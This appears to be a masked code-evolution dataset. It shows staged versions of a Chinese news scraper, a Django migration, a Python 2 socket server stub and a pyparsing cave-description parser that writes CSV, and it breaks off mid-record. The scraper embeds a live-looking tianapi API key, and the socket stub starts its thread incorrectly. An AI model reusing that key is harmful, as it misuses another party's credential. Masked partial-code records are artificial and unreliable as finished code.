"step-1": "<mask token>\n\n\ndef china_lunar():\n today = str(date.today())\n today_list = today.split('-')\n lunar_day = lunar.getDayBySolar(int(datetime.datetime.now().year), int(\n datetime.datetime.now().month), int(datetime.datetime.now().day))\n if lunar_day.Lleap:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n else:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n return today, china_day\n\n\n<mask token>\n\n\ndef news_put():\n news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1\n ] + '\\n' + morning_news()\n return news_spider_message\n\n\n<mask token>\n\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society, headers=headers)\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath(\n '//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n newss_1 = ''\n number = 1\n for t in title:\n newss = str(number) + ':' + str_list(t.text\n ) + '。' + '\\n' + ' 概要:' + str_list(news[title.index(t)].text\n ) + '。' + '\\n' + ' 详情:' + '\\n' + '\\n'\n newss_1 += newss\n number += 1\n return newss_1\n\n\n<mask token>\n\n\ndef str_list(t):\n m = ''\n for i in list(t):\n if i == '中':\n china = 'Z'\n m += china + '_'\n else:\n m += i + '_'\n return m\n",
"step-2": "<mask token>\n\n\ndef china_lunar():\n today = str(date.today())\n today_list = today.split('-')\n lunar_day = lunar.getDayBySolar(int(datetime.datetime.now().year), int(\n datetime.datetime.now().month), int(datetime.datetime.now().day))\n if lunar_day.Lleap:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n else:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n return today, china_day\n\n\n<mask token>\n\n\ndef morning_news():\n news_api = (\n 'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'\n )\n response = requests.get(news_api)\n print(dict(response.json()))\n news_list = dict(response.json())\n news = ''\n m = 1\n news_q = ''\n for i in news_list['newslist']:\n img_url = ''\n if i['url'] == '':\n img_url = i['imgsrc']\n news = str(str(m) + ':' + i['title'] + '\\n' + i['url'] + img_url + '\\n'\n )\n news_q += str(news)\n m += 1\n return news_q\n\n\ndef news_put():\n news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1\n ] + '\\n' + morning_news()\n return news_spider_message\n\n\n<mask token>\n\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society, headers=headers)\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath(\n '//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n newss_1 = ''\n number = 1\n for t in title:\n newss = str(number) + ':' + str_list(t.text\n ) + '。' + '\\n' + ' 概要:' + str_list(news[title.index(t)].text\n ) + '。' + '\\n' + ' 详情:' + '\\n' + '\\n'\n newss_1 += newss\n number += 1\n return newss_1\n\n\ndef NewYork_news_put(page=0):\n news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[\n 1] + '\\n' + NewYork_news(page)\n return news_spider_message\n\n\ndef 
str_list(t):\n m = ''\n for i in list(t):\n if i == '中':\n china = 'Z'\n m += china + '_'\n else:\n m += i + '_'\n return m\n",
"step-3": "<mask token>\nymc = [u'十一', u'十二', u'正', u'二', u'三', u'四', u'五', u'六', u'七', u'八', u'九', u'十'\n ]\nrmc = [u'初一', u'初二', u'初三', u'初四', u'初五', u'初六', u'初七', u'初八', u'初九', u'初十',\n u'十一', u'十二', u'十三', u'十四', u'十五', u'十六', u'十七', u'十八', u'十九', u'二十',\n u'廿一', u'廿二', u'廿三', u'廿四', u'廿五', u'廿六', u'廿七', u'廿八', u'廿九', u'三十', u'卅一'\n ]\nlunar = sxtwl.Lunar()\n\n\ndef china_lunar():\n today = str(date.today())\n today_list = today.split('-')\n lunar_day = lunar.getDayBySolar(int(datetime.datetime.now().year), int(\n datetime.datetime.now().month), int(datetime.datetime.now().day))\n if lunar_day.Lleap:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n else:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n return today, china_day\n\n\n<mask token>\n\n\ndef morning_news():\n news_api = (\n 'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'\n )\n response = requests.get(news_api)\n print(dict(response.json()))\n news_list = dict(response.json())\n news = ''\n m = 1\n news_q = ''\n for i in news_list['newslist']:\n img_url = ''\n if i['url'] == '':\n img_url = i['imgsrc']\n news = str(str(m) + ':' + i['title'] + '\\n' + i['url'] + img_url + '\\n'\n )\n news_q += str(news)\n m += 1\n return news_q\n\n\ndef news_put():\n news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1\n ] + '\\n' + morning_news()\n return news_spider_message\n\n\nheaders = {'User-Agent':\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'\n }\n\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society, headers=headers)\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath(\n 
'//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n newss_1 = ''\n number = 1\n for t in title:\n newss = str(number) + ':' + str_list(t.text\n ) + '。' + '\\n' + ' 概要:' + str_list(news[title.index(t)].text\n ) + '。' + '\\n' + ' 详情:' + '\\n' + '\\n'\n newss_1 += newss\n number += 1\n return newss_1\n\n\ndef NewYork_news_put(page=0):\n news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[\n 1] + '\\n' + NewYork_news(page)\n return news_spider_message\n\n\ndef str_list(t):\n m = ''\n for i in list(t):\n if i == '中':\n china = 'Z'\n m += china + '_'\n else:\n m += i + '_'\n return m\n",
"step-4": "import requests\nimport sxtwl\nimport datetime\nfrom datetime import date\nimport lxml\nfrom lxml import etree\nymc = [u'十一', u'十二', u'正', u'二', u'三', u'四', u'五', u'六', u'七', u'八', u'九', u'十'\n ]\nrmc = [u'初一', u'初二', u'初三', u'初四', u'初五', u'初六', u'初七', u'初八', u'初九', u'初十',\n u'十一', u'十二', u'十三', u'十四', u'十五', u'十六', u'十七', u'十八', u'十九', u'二十',\n u'廿一', u'廿二', u'廿三', u'廿四', u'廿五', u'廿六', u'廿七', u'廿八', u'廿九', u'三十', u'卅一'\n ]\nlunar = sxtwl.Lunar()\n\n\ndef china_lunar():\n today = str(date.today())\n today_list = today.split('-')\n lunar_day = lunar.getDayBySolar(int(datetime.datetime.now().year), int(\n datetime.datetime.now().month), int(datetime.datetime.now().day))\n if lunar_day.Lleap:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n else:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n return today, china_day\n\n\nimport json\n\n\ndef morning_news():\n news_api = (\n 'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'\n )\n response = requests.get(news_api)\n print(dict(response.json()))\n news_list = dict(response.json())\n news = ''\n m = 1\n news_q = ''\n for i in news_list['newslist']:\n img_url = ''\n if i['url'] == '':\n img_url = i['imgsrc']\n news = str(str(m) + ':' + i['title'] + '\\n' + i['url'] + img_url + '\\n'\n )\n news_q += str(news)\n m += 1\n return news_q\n\n\ndef news_put():\n news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1\n ] + '\\n' + morning_news()\n return news_spider_message\n\n\nheaders = {'User-Agent':\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'\n }\n\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society, headers=headers)\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n news = 
mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath(\n '//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n newss_1 = ''\n number = 1\n for t in title:\n newss = str(number) + ':' + str_list(t.text\n ) + '。' + '\\n' + ' 概要:' + str_list(news[title.index(t)].text\n ) + '。' + '\\n' + ' 详情:' + '\\n' + '\\n'\n newss_1 += newss\n number += 1\n return newss_1\n\n\ndef NewYork_news_put(page=0):\n news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[\n 1] + '\\n' + NewYork_news(page)\n return news_spider_message\n\n\ndef str_list(t):\n m = ''\n for i in list(t):\n if i == '中':\n china = 'Z'\n m += china + '_'\n else:\n m += i + '_'\n return m\n",
"step-5": "import requests\nimport sxtwl\nimport datetime\nfrom datetime import date\nimport lxml\nfrom lxml import etree\n# 日历中文索引\nymc = [u\"十一\", u\"十二\", u\"正\", u\"二\", u\"三\", u\"四\", u\"五\", u\"六\", u\"七\", u\"八\", u\"九\", u\"十\"]\nrmc = [u\"初一\", u\"初二\", u\"初三\", u\"初四\", u\"初五\", u\"初六\", u\"初七\", u\"初八\", u\"初九\", u\"初十\", \\\n u\"十一\", u\"十二\", u\"十三\", u\"十四\", u\"十五\", u\"十六\", u\"十七\", u\"十八\", u\"十九\", \\\n u\"二十\", u\"廿一\", u\"廿二\", u\"廿三\", u\"廿四\", u\"廿五\", u\"廿六\", u\"廿七\", u\"廿八\", u\"廿九\", u\"三十\", u\"卅一\"]\n\n# 日历库实例化\nlunar = sxtwl.Lunar()\n\n\n\n# 2.阳历转阴历\n\n\ndef china_lunar():\n today = str(date.today())\n\n today_list = today.split('-') # ['2019', '08', '08']\n lunar_day = lunar.getDayBySolar((int)(datetime.datetime.now().year), (int)(datetime.datetime.now().month), (int)(datetime.datetime.now().day)) # 输入年月日\n # 判断是否为润年\n if (lunar_day.Lleap):\n china_day = \"农历:{0}月{1}\".format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n else:\n china_day =\"农历:{0}月{1}\".format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n return today,china_day\n\n\nimport json\ndef morning_news():\n news_api = 'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'\n response = requests.get(news_api)\n print(dict(response.json()))\n news_list = dict(response.json())\n news = ''\n m = 1\n news_q=''\n for i in news_list['newslist']:\n img_url=''\n if i['url'] == '':\n img_url = i['imgsrc']\n news = str(str(m)+\":\"+i['title']+\"\\n\"+i['url']+img_url+\"\\n\")\n news_q += str(news)\n m += 1\n\n return news_q\n\ndef news_put():\n news_spider_message = '【早间新闻】 '+china_lunar()[0]+\" \"+china_lunar()[1]+\"\\n\"+morning_news()\n return news_spider_message\n\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'}\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society,headers =headers )\n mytree = 
lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n # print(mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div[2]/div/ul//h3/a')[1].text) #这个是标题\n # print(mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div[2]/div/ul//p')[1].text) # 这个是简介\n #\n # print(mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div[2]/div/ul//h3/a/@href')[1]) # 这个是链接\n newss_1 = ''\n number = 1\n for t in title:\n\n newss = str(number)+\":\"+str_list(t.text) +'。'+'\\n'+' 概要:'+str_list(news[title.index(t)].text)+'。'+'\\n'+' 详情:'+'\\n'+'\\n'\n newss_1 +=newss\n number += 1\n\n return newss_1\n\n\n\ndef NewYork_news_put(page=0):\n news_spider_message = '【纽约时报中文网】'+china_lunar()[0]+\" \"+china_lunar()[1]+\"\\n\"+NewYork_news(page)\n\n return news_spider_message\n\ndef str_list(t):\n m=''\n for i in list(t):\n if i == '中':\n china = 'Z'\n m += china +'_'\n else:\n\n m += i + '_'\n\n\n return m\n",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
# Generated by Django 2.1.1 on 2019-11-20 12:34
from django.db import migrations
class Migration(migrations.Migration):
    """Drop the retired sandbox report/task models from the schema."""

    dependencies = [
        ('sandbox_report', '0006_sandboxreportlink_sandboxreportval'),
    ]

    # Each DeleteModel removes the database table backing the named model.
    operations = [
        migrations.DeleteModel(name='SandboxReportLink'),
        migrations.DeleteModel(name='SandboxReportVal'),
        migrations.DeleteModel(name='SandboxTask'),
    ]
|
normal
|
{
"blob_id": "b92497396e711d705760db547b43cc65beba6cfd",
"index": 6172,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('sandbox_report',\n '0006_sandboxreportlink_sandboxreportval')]\n operations = [migrations.DeleteModel(name='SandboxReportLink'),\n migrations.DeleteModel(name='SandboxReportVal'), migrations.\n DeleteModel(name='SandboxTask')]\n",
"step-4": "from django.db import migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [('sandbox_report',\n '0006_sandboxreportlink_sandboxreportval')]\n operations = [migrations.DeleteModel(name='SandboxReportLink'),\n migrations.DeleteModel(name='SandboxReportVal'), migrations.\n DeleteModel(name='SandboxTask')]\n",
"step-5": "# Generated by Django 2.1.1 on 2019-11-20 12:34\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('sandbox_report', '0006_sandboxreportlink_sandboxreportval'),\n ]\n\n operations = [\n migrations.DeleteModel(\n name='SandboxReportLink',\n ),\n migrations.DeleteModel(\n name='SandboxReportVal',\n ),\n migrations.DeleteModel(\n name='SandboxTask',\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import socket
import threading
# WebSocket server bind address as a (host, port) pair; loopback only.
WS_ADDR = ("127.0.0.1",9876)
def ws_handler(sock,addr):
    # Handle one accepted client connection (runs on its own thread).
    # NOTE(review): the WebSocket handshake and framing are not implemented --
    # these prints are placeholders; sock is never read, written, or closed.
    print 'ws handshaking...'
    print 'connected...'
    print 'closing...'
def websocket_server():
    # Accept loop: bind WS_ADDR and spawn one ws_handler thread per client.
    # This function never returns.
    print 'listening for a WS connection... '
    svSock = socket.socket()
    # SO_REUSEADDR lets the server rebind the port quickly after a restart.
    svSock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
    svSock.bind(WS_ADDR)
    svSock.listen(5)  # allow up to 5 pending connections
    while (1):
        wSock,wAddr = svSock.accept()
        print 'accepted!'
        # Handler threads are non-daemon, so they keep the process alive.
        threading.Thread(target=ws_handler,args=(wSock,wAddr)).start()
# a new listen thread
def listen_ws():
    """Start the WebSocket accept loop on a background thread."""
    # BUG FIX: the original wrote target=websocket_server() -- the () called
    # the (blocking, never-returning) server immediately on this thread and
    # handed Thread its return value instead of the function itself.
    # Thread's target must be the callable, not the result of calling it.
    threading.Thread(target=websocket_server).start()
|
normal
|
{
"blob_id": "668fe3d561d94be73f2f721fac89e9e25005769b",
"index": 2652,
"step-1": "import socket\nimport threading\n\n#WebSocket Server Address\nWS_ADDR = (\"127.0.0.1\",9876)\n\n\ndef ws_handler(sock,addr):\n print 'ws handshaking...'\n print 'connected...'\n print 'closing...'\n\n\ndef websocket_server():\n print 'listening for a WS connection... '\n svSock = socket.socket()\n svSock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)\n svSock.bind(WS_ADDR)\n svSock.listen(5)\n while (1):\n wSock,wAddr = svSock.accept()\n print 'accepted!'\n threading.Thread(target=ws_handler,args=(wSock,wAddr)).start()\n\n\n# a new listen thread\ndef listen_ws():\n threading.Thread(target=websocket_server()).start()",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import sys
import os
from pyparsing import *
import csv
def parse_cave_details(details):
    """Parse one Bretz-style cave-description line into a pyparsing result.

    The returned ParseResults exposes named fields: ``name``, ``aliquot``,
    ``section`` (list of section numbers), ``township``/``range`` (each with
    ``number`` and ``direction``), ``county``, ``quad`` (``is_on_map``,
    optional ``alias``, ``name``), and ``description``.

    Raises pyparsing.ParseException when *details* does not match the grammar.
    """
    ##########################################################################
    # Define the Bretz Grammar.
    # Sample cave description:
    #   Boring Caverns SE1/4 NW1/4 sec. 16, T. 37 N., R. 10 W., Pulaski County Not shown on Waynesville Quadrangle map The mouth of this cave ...\n
    #   Another Cave S1/2 sec. 15, T. 36 N., R. 12 W., Pulaski County Not shown on Waynesville Quadrangle map There are two large caves...\n
    #   Something Bridge Sec. 15 or 22, T. 36 N., R. 13 W., Pulaski County Not shown on Richland Quadrangle map This cave is near Ozark...\n
    #
    # CAVE ::= CAVE_NAME [ALIQUOT_PART] SECTION, TOWNSHIP, RANGE, COUNTY QUAD_MAP DESCRIPTION
    # ALIQUOT_PART ::= (((NE|SE|SW|NW)1/4)|((N|E|S|W)1/2))*
    # SECTION ::= (S|s)ec. num+
    # TOWNSHIP ::= T. num+ TOWNSHIP_DIR.
    # TOWNSHIP_DIR ::= N|S
    # RANGE ::= R. num+ RANGE_DIR.
    # RANGE_DIR ::= E|W
    # COUNTY = WORD+ County
    # QUAD_MAP = (Not s|S)hown on QUAD Quadrangle map
    # QUAD = WORD+
    # DESCRIPTION = WORD+

    # Aliquot parts: quarter-sections like "NE1/4" and half-sections like
    # "N1/2"; the "1/4"/"1/2" tokens are suppressed, keeping only letters.
    aliquotQuadrantID = Literal("NE") |\
                        Literal("SE") |\
                        Literal("SW") |\
                        Literal("NW")
    aliquotQuadrantString = aliquotQuadrantID + Suppress("1/4")
    aliquotHalfString = oneOf("N E S W") + Suppress("1/2")
    aliquotPart = Group(ZeroOrMore(aliquotQuadrantString | aliquotHalfString))\
        .setResultsName("aliquot")\
        .setParseAction(lambda kwd: " ".join(kwd[0]))

    # "sec."/"Sec" followed by one or more numbers joined by "or".
    sectionToken = Suppress(oneOf("S s") + Literal("ec") + Optional("."))
    sectionNumber = Word(nums)
    section = Group(
        sectionToken \
        + sectionNumber \
        + ZeroOrMore(Suppress("or") + sectionNumber)
    ).setResultsName("section")

    # The cave name is every word up to (but not including) the first token
    # that can start the location clause; ~X is pyparsing negative lookahead.
    afterEndOfCaveName = aliquotHalfString | aliquotQuadrantString | sectionToken
    caveName = Group(OneOrMore(~afterEndOfCaveName + Word(printables)))\
        .setResultsName('name')\
        .setParseAction(lambda name: " ".join(name[0]))

    # PLSS township: "T. <num> <N|S>."
    townshipDirection = oneOf("N S").setResultsName("direction")
    townshipNumber = Word(nums).setResultsName("number")
    township = Suppress("T.") \
        + Group(townshipNumber + townshipDirection).setResultsName("township")\
        + Suppress('.')

    # PLSS range: "R. <num> <E|W>."
    rangeDirection = oneOf("E W").setResultsName("direction")
    rangeNumber = Word(nums).setResultsName("number")
    range_info = Suppress("R.") \
        + Group(rangeNumber + rangeDirection).setResultsName("range")\
        + Suppress('.')

    # County name: words up to the "County" keyword.
    countyKeyword = Literal("County")
    countyName = Group(OneOrMore(~countyKeyword + Word(alphas+"-'.")))\
        .setResultsName("county")\
        .setParseAction(lambda c: " ".join(c[0]))
    county = countyName + Suppress("County")

    # "Not shown on" vs "Shown on": the parse actions turn the "Not s"/"S"
    # prefix into a boolean; the shared "hown" tail is suppressed separately.
    notShownOnQuad = (Literal("Not") + Suppress("s"))\
        .setParseAction(lambda x: False)
    shownOnQuad = Literal("S").setParseAction(lambda x: True)
    onKeyword = Literal("on")
    mapAlias = Group(OneOrMore(~onKeyword + Word(printables)))\
        .setParseAction(lambda alias: " ".join(alias[0]))\
        .setResultsName("alias")
    quadrangleStatus = (shownOnQuad | notShownOnQuad).setResultsName("is_on_map")\
        + Suppress("hown") \
        + Optional(Suppress('as') + mapAlias)\
        + Suppress(onKeyword)
    quadrangleKeyword = Literal("Quadrangle") + Literal("map")
    quadrangleName = Group(OneOrMore(~quadrangleKeyword + Word(alphas+"-'.")))\
        .setResultsName("name")\
        .setParseAction(lambda name: " ".join(name[0]))
    quadrangle = Group(quadrangleStatus + quadrangleName).setResultsName("quad") \
        + Suppress(quadrangleKeyword)

    # Free-text remainder of the line.
    description = Group(ZeroOrMore(Word(alphanums + printables)))\
        .setResultsName("description")\
        .setParseAction(lambda desc: " ".join(desc[0]))

    # Full line = name, optional aliquot part, then comma-separated
    # section/township/range, county, quad status, and description.
    location = caveName \
        + aliquotPart \
        + section + Suppress(',') \
        + township + Suppress(',') \
        + range_info + Suppress(',')\
        + county \
        + quadrangle \
        + description

    return location.parseString(details)
if __name__ == "__main__":
    # Usage: python thisscript.py /path/to/file.txt
    if len(sys.argv) < 2:
        print("ERROR: pass in the filename as the second argument.")
        print(" $ python {0} /path/to/file.txt".format(sys.argv[0]))
        exit()

    filepath = sys.argv[1]
    with open(filepath) as f:
        raw_text = f.read()

    # One cave description per line.
    raw_caves = raw_text.split("\n")
    caves = []
    for raw_cave_text in raw_caves:
        raw_cave_text = raw_cave_text.strip()
        if not raw_cave_text:
            continue
        try:
            cave = parse_cave_details(raw_cave_text)
            caves.append({
                'Cave name': cave.name,
                'Alias': cave.quad.alias,
                'On map': cave.quad.is_on_map,
                'Quad': cave.quad.name,
                'County': cave.county,
                'State': 'MO',
                'Principal Meridian Code': 5,
                'Township Number': cave.township.number,
                'Township Fraction': 0,
                'Township Direction': cave.township.direction,
                'Range Number': cave.range.number,
                'Range Fraction': 0,
                'Range Direction': cave.range.direction,
                'Section': cave.section[0],
                'Section Division': "".join(cave.aliquot),
                'Township Duplicate': 0,
                'Description': raw_cave_text,
            })
        except Exception:
            # BUG FIX: the original referenced cave.name here, but `cave` is
            # unbound on the first failure (and stale afterwards), so the
            # resulting NameError masked the real parse error. Report the raw
            # line instead. Bare `except:` also tightened to `Exception` so
            # KeyboardInterrupt/SystemExit still propagate.
            print("="*80)
            print("ERROR: unexpected format for {0}".format(raw_cave_text[:60]))
            print(raw_cave_text)
            import traceback
            print(traceback.format_exc())
            print("\t" + "\n\t".join([str(x) for x in sys.exc_info()]))
            print("Skipping this cave for the next one")

    # Guard: caves[0] below would raise IndexError on an empty result set.
    if not caves:
        print("No caves parsed; nothing to save.")
        exit()

    output_path = os.path.basename(filepath).split(".")[0] + ".csv"
    print("#"*80)
    print("{0} caves processed! Saving to '{1}'.".format(len(caves), output_path))
    # NOTE(review): 'wb' matches the Python 2 csv module; on Python 3 this
    # must be open(output_path, 'w', newline='') instead -- confirm target.
    with open(output_path, 'wb') as f:
        cave_csv = csv.DictWriter(f, fieldnames=caves[0].keys())
        try:
            cave_csv.writeheader()
        except AttributeError:
            # Python before 2.7 has no DictWriter.writeheader(); emit the
            # header row manually.
            header = {}
            for k in caves[0].keys():
                header[k] = k
            cave_csv.writerow(header)
        cave_csv.writerows(caves)
|
normal
|
{
"blob_id": "1fc1d2e1a7d18b1ef8ee6396210afe47a63ab09f",
"index": 3267,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef parse_cave_details(details):\n aliquotQuadrantID = Literal('NE') | Literal('SE') | Literal('SW'\n ) | Literal('NW')\n aliquotQuadrantString = aliquotQuadrantID + Suppress('1/4')\n aliquotHalfString = oneOf('N E S W') + Suppress('1/2')\n aliquotPart = Group(ZeroOrMore(aliquotQuadrantString | aliquotHalfString)\n ).setResultsName('aliquot').setParseAction(lambda kwd: ' '.join(kwd[0])\n )\n sectionToken = Suppress(oneOf('S s') + Literal('ec') + Optional('.'))\n sectionNumber = Word(nums)\n section = Group(sectionToken + sectionNumber + ZeroOrMore(Suppress('or'\n ) + sectionNumber)).setResultsName('section')\n afterEndOfCaveName = (aliquotHalfString | aliquotQuadrantString |\n sectionToken)\n caveName = Group(OneOrMore(~afterEndOfCaveName + Word(printables))\n ).setResultsName('name').setParseAction(lambda name: ' '.join(name[0]))\n townshipDirection = oneOf('N S').setResultsName('direction')\n townshipNumber = Word(nums).setResultsName('number')\n township = Suppress('T.') + Group(townshipNumber + townshipDirection\n ).setResultsName('township') + Suppress('.')\n rangeDirection = oneOf('E W').setResultsName('direction')\n rangeNumber = Word(nums).setResultsName('number')\n range_info = Suppress('R.') + Group(rangeNumber + rangeDirection\n ).setResultsName('range') + Suppress('.')\n countyKeyword = Literal('County')\n countyName = Group(OneOrMore(~countyKeyword + Word(alphas + \"-'.\"))\n ).setResultsName('county').setParseAction(lambda c: ' '.join(c[0]))\n county = countyName + Suppress('County')\n notShownOnQuad = (Literal('Not') + Suppress('s')).setParseAction(lambda\n x: False)\n shownOnQuad = Literal('S').setParseAction(lambda x: True)\n onKeyword = Literal('on')\n mapAlias = Group(OneOrMore(~onKeyword + Word(printables))).setParseAction(\n lambda alias: ' '.join(alias[0])).setResultsName('alias')\n quadrangleStatus = (shownOnQuad | notShownOnQuad).setResultsName(\n 'is_on_map') + Suppress('hown') + Optional(Suppress('as') + 
mapAlias\n ) + Suppress(onKeyword)\n quadrangleKeyword = Literal('Quadrangle') + Literal('map')\n quadrangleName = Group(OneOrMore(~quadrangleKeyword + Word(alphas + \"-'.\"))\n ).setResultsName('name').setParseAction(lambda name: ' '.join(name[0]))\n quadrangle = Group(quadrangleStatus + quadrangleName).setResultsName('quad'\n ) + Suppress(quadrangleKeyword)\n description = Group(ZeroOrMore(Word(alphanums + printables))\n ).setResultsName('description').setParseAction(lambda desc: ' '.\n join(desc[0]))\n location = caveName + aliquotPart + section + Suppress(','\n ) + township + Suppress(',') + range_info + Suppress(','\n ) + county + quadrangle + description\n return location.parseString(details)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef parse_cave_details(details):\n aliquotQuadrantID = Literal('NE') | Literal('SE') | Literal('SW'\n ) | Literal('NW')\n aliquotQuadrantString = aliquotQuadrantID + Suppress('1/4')\n aliquotHalfString = oneOf('N E S W') + Suppress('1/2')\n aliquotPart = Group(ZeroOrMore(aliquotQuadrantString | aliquotHalfString)\n ).setResultsName('aliquot').setParseAction(lambda kwd: ' '.join(kwd[0])\n )\n sectionToken = Suppress(oneOf('S s') + Literal('ec') + Optional('.'))\n sectionNumber = Word(nums)\n section = Group(sectionToken + sectionNumber + ZeroOrMore(Suppress('or'\n ) + sectionNumber)).setResultsName('section')\n afterEndOfCaveName = (aliquotHalfString | aliquotQuadrantString |\n sectionToken)\n caveName = Group(OneOrMore(~afterEndOfCaveName + Word(printables))\n ).setResultsName('name').setParseAction(lambda name: ' '.join(name[0]))\n townshipDirection = oneOf('N S').setResultsName('direction')\n townshipNumber = Word(nums).setResultsName('number')\n township = Suppress('T.') + Group(townshipNumber + townshipDirection\n ).setResultsName('township') + Suppress('.')\n rangeDirection = oneOf('E W').setResultsName('direction')\n rangeNumber = Word(nums).setResultsName('number')\n range_info = Suppress('R.') + Group(rangeNumber + rangeDirection\n ).setResultsName('range') + Suppress('.')\n countyKeyword = Literal('County')\n countyName = Group(OneOrMore(~countyKeyword + Word(alphas + \"-'.\"))\n ).setResultsName('county').setParseAction(lambda c: ' '.join(c[0]))\n county = countyName + Suppress('County')\n notShownOnQuad = (Literal('Not') + Suppress('s')).setParseAction(lambda\n x: False)\n shownOnQuad = Literal('S').setParseAction(lambda x: True)\n onKeyword = Literal('on')\n mapAlias = Group(OneOrMore(~onKeyword + Word(printables))).setParseAction(\n lambda alias: ' '.join(alias[0])).setResultsName('alias')\n quadrangleStatus = (shownOnQuad | notShownOnQuad).setResultsName(\n 'is_on_map') + Suppress('hown') + Optional(Suppress('as') + 
